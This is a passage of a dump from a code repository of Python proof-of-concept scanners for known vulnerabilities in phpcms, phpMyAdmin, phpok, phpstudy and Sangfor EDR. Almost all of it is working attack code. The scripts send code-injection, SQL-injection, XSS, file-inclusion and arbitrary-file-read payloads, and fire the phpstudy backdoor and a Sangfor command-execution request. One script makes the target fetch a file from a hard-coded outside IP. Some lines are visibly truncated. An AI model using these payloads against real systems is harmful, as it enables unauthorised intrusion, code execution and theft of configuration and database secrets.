6 | author: Lucifer
7 | description: 文件product.php中,参数pagesize存在代码注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_product_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/yp/product.php?pagesize=${@phpinfo()}"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在phpcms2008 product.php 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | return True
29 | else:
30 | cprint("[-]不存在phpcms_product_code_exec漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = phpcms_product_code_exec_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_v961_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms 9.6.1任意文件读取漏洞
5 | referer: http://bobao.360.cn/learning/detail/3805.html
6 | author: Lucifer
7 | description: phpcms最新版本任意文件读取,漏洞原理见来源页面。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpcms_v961_fileread_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "Content-Type":"application/x-www-form-urlencoded",
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | url_preffix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
25 | siteid = ""
26 | att_json = ""
27 | try:
28 | req1 = requests.get(url_preffix, headers=headers, timeout=10, verify=False)
29 | for cookie in req1.cookies:
30 | siteid = cookie.value
31 | payload = "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&filename=test.jpg&src=%26i%3D3%26d%3D1%26t%3D9999999999%26catid%3D1%26ip%3D8.8.8.8%26m%3D3%26modelid%3D3%26s%3Dcaches%2fconfigs%2fsystem.p%26f%3Dh%25253Cp%26xxxx%3D"
32 | vulnurl = self.url + payload
33 | post_data = {
34 | "userid_flash":siteid
35 | }
36 | req2 = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
37 | for cookie in req2.cookies:
38 | att_json = cookie.value
39 | req3 = requests.get(self.url+"/index.php?m=content&c=down&a=init&a_k="+att_json, headers=headers, timeout=10, verify=False)
40 | pattern = '.*?'
41 | link = re.search(pattern, req3.text).group(1)
42 | req4 = requests.get(self.url+"/index.php"+link, headers=headers, verify=False)
43 | if r"可能不存在漏洞", "cyan")
51 |
52 | if __name__ == "__main__":
53 | warnings.filterwarnings("ignore")
54 | testVuln = phpcms_v961_fileread_BaseVerify(sys.argv[1])
55 | testVuln.run()
56 |
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_v96_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms v9.6.0 SQL注入
5 | referer: https://zhuanlan.zhihu.com/p/26263513
6 | author: Lucifer
7 | description: 过滤函数不严谨造成的过滤绕过。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_v96_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "Content-Type":"application/x-www-form-urlencoded",
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | url_prefix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
24 | tmp_cookie = {}
25 | try:
26 | req = requests.get(url_prefix, headers=headers, timeout=10, verify=False)
27 | for cookie in req.cookies:
28 | tmp_cookie = cookie.value
29 | except:
30 | pass
31 | post_data = {
32 | "userid_flash":tmp_cookie
33 | }
34 | url_suffix = self.url + "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26"
35 | try:
36 | req2 = requests.post(url_suffix, data=post_data, headers=headers, timeout=10, verify=False)
37 | for cookie in req2.cookies:
38 | tmp_cookie = cookie.value
39 | except:
40 | pass
41 |
42 | vulnurl = self.url + "/index.php?m=content&c=down&a_k="+str(tmp_cookie)
43 | try:
44 | req3 = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
45 | if r"XPATH syntax error" in req3.text:
46 | cprint("[+]存在phpcms v9.6.0 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
47 | return True
48 | else:
49 | cprint("[-]不存在phpcms_v96_sqli漏洞", "white", "on_grey")
50 |
51 | except:
52 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
53 |
54 | if __name__ == "__main__":
55 | warnings.filterwarnings("ignore")
56 | testVuln = phpcms_v96_sqli_BaseVerify(sys.argv[1])
57 | testVuln.run()
58 |
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_v9_flash_xss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms v9 flash xss漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 文件player.swf中,存在xss漏洞。
8 | '''
9 | import sys
10 | import urllib.request
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class phpcms_v9_flash_xss_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | flash_md5 = "cf00b069e36e756705c49b3a3bf20c40"
25 | payload = "/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//"
26 | vulnurl = self.url + payload
27 | try:
28 | req = urllib.request.urlopen(vulnurl)
29 | data = req.read()
30 | md5_value = hashlib.md5(data).hexdigest()
31 | if md5_value in flash_md5:
32 | cprint("[+]存在phpcms v9 flash xss漏洞...(高危)\tpayload: "+vulnurl, "red")
33 | return True
34 | else:
35 | cprint("[-]不存在phpcms_v9_flash_xss漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = phpcms_v9_flash_xss_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpmyadmin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpmyadmin/phpmyadmin_setup_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行
5 | referer: http://www.mottoin.com/87915.html
6 | author: Lucifer
7 | description: 文件setup.php中,参数configuration经过序列化对象可导致文件包含漏洞。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpmyadmin_setup_lfi_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/scripts/setup.php"
24 | post_data ={
25 | 'configuration':'O:10:"PMA_Config":1:{s:6:"source";s:11:"c:/boot.ini";}',
26 | 'action':'test'
27 | }
28 | vulnurl = self.url + payload
29 | try:
30 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
31 | if r"boot loader" in req.text:
32 | cprint("[+]存在PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行漏洞(WINDOWS)...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
33 | return True
34 | else:
35 | cprint("[-]不存在phpmyadmin_setup_lfi漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = phpmyadmin_setup_lfi_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/phpok_api_param_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok api.php SQL注入漏洞
5 | referer: http://www.moonsec.com/post-677.html
6 | author: Lucifer
7 | description: api_control文件存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpok_api_param_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/api.php?c=api&f=phpok&id=_total¶m[pid]=42¶m[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | return True
29 | else:
30 | cprint("[-]不存在phpok_api_param_sqli漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = phpok_api_param_sqli_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/phpok_remote_image_getshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok remote_image getshell漏洞
5 | referer: http://0day5.com/archives/1820/
6 | author: Lucifer
7 | description: remote_image_f函数没对远程文件后缀做检查直接保存到本地。
8 | '''
9 | import sys
10 | import time
11 | import hashlib
12 | import datetime
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
17 | class phpok_remote_image_getshell_BaseVerify:
18 | def __init__(self, url):
19 | self.url = url
20 |
21 | def run(self):
22 | headers = {
23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
24 | }
25 | time_stamp = time.mktime(datetime.datetime.now().timetuple())
26 | m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
27 | md5_str = m.hexdigest()
28 | payload = "/index.php?c=ueditor&f=remote_image&upfile=http://45.76.158.91:6868/" + md5_str
29 | vulnurl = self.url + payload
30 | try:
31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
32 | eye_url = "http://45.76.158.91/web.log"
33 | time.sleep(6)
34 | reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
35 | if md5_str in reqr.text:
36 | cprint("[+]存在phpok remote_image getshell漏洞...(高危)\tpayload: "+vulnurl, "red")
37 | return True
38 | else:
39 | cprint("[-]不存在phpok_remote_image_getshell漏洞", "white", "on_grey")
40 |
41 | except:
42 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
43 |
44 | if __name__ == "__main__":
45 | warnings.filterwarnings("ignore")
46 | testVuln = phpok_remote_image_getshell_BaseVerify(sys.argv[1])
47 | testVuln.run()
48 |
--------------------------------------------------------------------------------
/POC_Scan/cms/phpok/phpok_res_action_control_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok res_action_control.php 任意文件下载(需要cookies文件)
5 | referer: unknown
6 | author: Lucifer
7 | description: 参数file未经过滤进入到下载方法导致任意文件下载。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpok_res_action_control_filedownload_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/admin.php?c=res_action&f=download&file=_config/db.ini.php"
24 | vulnurl = self.url + payload
25 | try:
26 | f = open(r'cookies.txt', 'r')
27 | cookies = {}
28 | for line in f.read().split(";"):
29 | name, value = line.strip().split("=",1)
30 | cookies[name]=value
31 | except:
32 | pass
33 | try:
34 | req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10, verify=False)
35 | if r"可能不存在漏洞", "cyan")
43 |
44 | if __name__ == "__main__":
45 | warnings.filterwarnings("ignore")
46 | testVuln = phpok_res_action_control_filedownload_BaseVerify(sys.argv[1])
47 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/__pycache__/phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/__pycache__/phpstudy_probe.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_probe.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpstudy/phpstudy_backdoor.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from termcolor import cprint
3 |
4 | class phpstudy_backdoor_BaseVerify():
5 | def __init__(self,url):
6 | self.url = url
7 |
8 | def run(self):
9 | poc = {
10 | "Accept-Charset": "cGhwaW5mbygpOw==",
11 | "Accept-Encoding": "gzip,deflate"
12 | }
13 | try:
14 | pocRequest = requests.get(self.url, headers=poc,timeout=3)
15 | if "phpinfo" in str(pocRequest.content):
16 | cprint("[+]存在phpstudy_backdoor漏洞\tpayload: "+self.url, "green")
17 | return True
18 | else:
19 | cprint("[-]不存在phpstudy_backdoor漏洞", "white", "on_grey")
20 | except :
21 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
22 |
23 | if __name__ == "__main__":
24 | test=phpstudy_backdoor_BaseVerify('http://192.168.5.8')
25 | test.run()
26 |
27 |
--------------------------------------------------------------------------------
/POC_Scan/cms/sangfor/__pycache__/sanfor_edr.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/sangfor/__pycache__/sanfor_edr.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/sangfor/sanfor_edr.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import urllib3
4 | from termcolor import cprint
5 | import sys
6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
7 |
8 | class sanfor_edr_rce_BaseVerify():
9 | def __init__(self,target):
10 | self.target = target
11 | self.payload = '/tool/log/c.php?strip_slashes=system&host=echo hello'
12 |
13 | def run(self):
14 | headers={
15 | 'Connection': 'close',
16 | 'Cache-Control': 'max-age=0',
17 | 'Upgrade-Insecure-Requests': '1',
18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',
19 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
20 | 'Sec-Fetch-Site': 'none',
21 | 'Sec-Fetch-Mode': 'navigate',
22 | 'Sec-Fetch-User': '?1',
23 | 'Sec-Fetch-Dest': 'document',
24 | 'Accept-Encoding': 'gzip, deflate',
25 | 'Accept-Language': 'zh-CN,zh;q=0.9'
26 | }
27 |
28 | url=self.target+self.payload
29 |
30 | try:
31 | response = requests.get(url,verify=False,headers=headers)
32 | response.raise_for_status()
33 | response.encoding = "utf-8"
34 | res=re.findall(r'Log Helper(.+?) |